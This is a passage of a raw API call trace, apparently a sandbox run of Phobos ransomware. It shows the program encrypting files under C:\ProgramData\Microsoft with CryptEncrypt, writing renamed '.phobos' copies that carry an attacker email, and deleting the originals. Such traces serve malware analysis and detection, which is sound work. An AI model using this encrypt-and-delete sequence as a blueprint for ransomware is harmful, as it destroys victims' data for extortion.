lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2f4fc88, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc88*=0xc0102, lpOverlapped=0x0) returned 1 [0144.272] SetEndOfFile (hFile=0x140) returned 1 [0144.273] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x3c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0144.273] WriteFile (in: hFile=0x140, lpBuffer=0x357013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357013a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0144.274] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x155555, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0144.274] WriteFile (in: hFile=0x140, lpBuffer=0x357013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357013a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0144.276] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0144.706] WriteFile (in: hFile=0x140, lpBuffer=0x357013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357013a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0144.929] CloseHandle (hObject=0x140) returned 1 [0145.384] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0145.384] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0145.385] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=262768) returned 1 [0145.385] CloseHandle (hObject=0x140) returned 1 [0145.385] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat")) returned 0x2020 [0145.385] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.385] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0145.385] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0145.385] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0145.385] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0145.532] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0145.532] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0145.532] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x40270, lpOverlapped=0x0) returned 1 [0145.633] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40280, dwBufLen=0x40280 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40280) returned 1 [0145.635] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x40280, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x40280, lpOverlapped=0x0) returned 1 [0145.640] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0145.640] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0145.640] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0145.640] CryptDestroyKey (hKey=0xa327e8) returned 1 [0145.640] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0145.640] CryptDestroyKey (hKey=0xa32d28) returned 1 [0145.641] CloseHandle (hObject=0x140) returned 1 [0145.641] CloseHandle (hObject=0x188) returned 1 [0145.648] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat")) returned 1 [0145.662] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0145.662] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racmetadata.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0145.666] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=8) returned 1 [0145.666] CloseHandle (hObject=0x188) returned 1 [0145.666] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racmetadata.dat")) returned 0x2020 [0145.666] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racmetadata.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.666] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racmetadata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0145.666] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0145.666] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0145.666] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racmetadata.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0145.667] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0145.667] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0145.667] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x8, lpOverlapped=0x0) returned 1 [0145.668] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10, dwBufLen=0x10 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10) returned 1 [0145.668] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x10, lpOverlapped=0x0) returned 1 [0145.668] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0145.669] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0145.669] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0145.669] CryptDestroyKey (hKey=0xa327e8) returned 1 [0145.669] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0145.669] CryptDestroyKey (hKey=0xa32d28) returned 1 [0145.669] CloseHandle (hObject=0x188) returned 1 [0145.669] CloseHandle (hObject=0x140) returned 1 [0145.669] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racmetadata.dat")) returned 1 [0145.670] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0145.670] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0145.670] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16412) returned 1 [0145.670] CloseHandle (hObject=0x140) returned 1 [0145.670] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat")) returned 0x2020 [0145.671] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.671] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0145.671] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0145.671] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0145.671] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0145.671] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0145.671] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0145.671] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x401c, lpOverlapped=0x0) returned 1 [0145.854] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4020, dwBufLen=0x4020 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4020) returned 1 [0145.854] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4020, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4020, lpOverlapped=0x0) returned 1 [0145.855] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0145.855] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0145.855] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0145.855] CryptDestroyKey (hKey=0xa32d68) returned 1 [0145.855] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0145.855] CryptDestroyKey (hKey=0xa32d28) returned 1 [0145.855] CloseHandle (hObject=0x140) returned 1 [0145.855] CloseHandle (hObject=0x188) returned 1 [0145.856] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat")) returned 1 [0145.857] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0145.857] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmieventdata.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0145.859] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49180) returned 1 [0145.859] CloseHandle (hObject=0x188) returned 1 [0145.859] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmieventdata.dat")) returned 0x2020 [0145.860] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmieventdata.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.860] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmieventdata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0145.860] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0145.860] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0145.860] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmieventdata.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0145.860] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0145.860] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0145.860] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xc01c, lpOverlapped=0x0) returned 1 [0145.862] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc020, dwBufLen=0xc020 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc020) returned 1 [0145.862] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc020, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc020, lpOverlapped=0x0) returned 1 [0145.864] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0145.864] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0145.864] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0145.864] CryptDestroyKey (hKey=0xa32d68) returned 1 [0145.864] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0145.864] CryptDestroyKey (hKey=0xa32d28) returned 1 [0145.864] CloseHandle (hObject=0x188) returned 1 [0145.864] CloseHandle (hObject=0x140) returned 1 [0145.865] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmieventdata.dat")) returned 1 [0145.866] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0145.866] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSS.log" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mss.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0145.866] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1048576) returned 1 [0145.866] CloseHandle (hObject=0x140) returned 1 [0145.866] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSS.log" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mss.log")) returned 0x2020 [0145.866] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSS.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mss.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.867] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSS.log" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mss.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0145.867] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0145.867] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0145.867] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSS.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mss.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0145.867] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0145.867] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0145.867] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x100000, lpOverlapped=0x0) returned 1 [0147.341] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100010, dwBufLen=0x100010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100010) returned 1 [0147.349] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100010, lpOverlapped=0x0) returned 1 [0147.369] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0147.369] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0147.369] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x30, dwBufLen=0x30 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x30) returned 1 [0147.369] CryptDestroyKey (hKey=0xa32da8) returned 1 [0147.369] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe2, lpOverlapped=0x0) returned 1 [0147.369] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.369] CloseHandle (hObject=0x140) returned 1 [0147.369] CloseHandle (hObject=0x188) returned 1 [0147.431] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSS.log" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mss.log")) returned 1 [0147.440] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0147.440] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0147.441] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=194032) returned 1 [0147.441] CloseHandle (hObject=0x188) returned 1 [0147.441] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db")) returned 0x2020 [0147.441] GetFileAttributesW 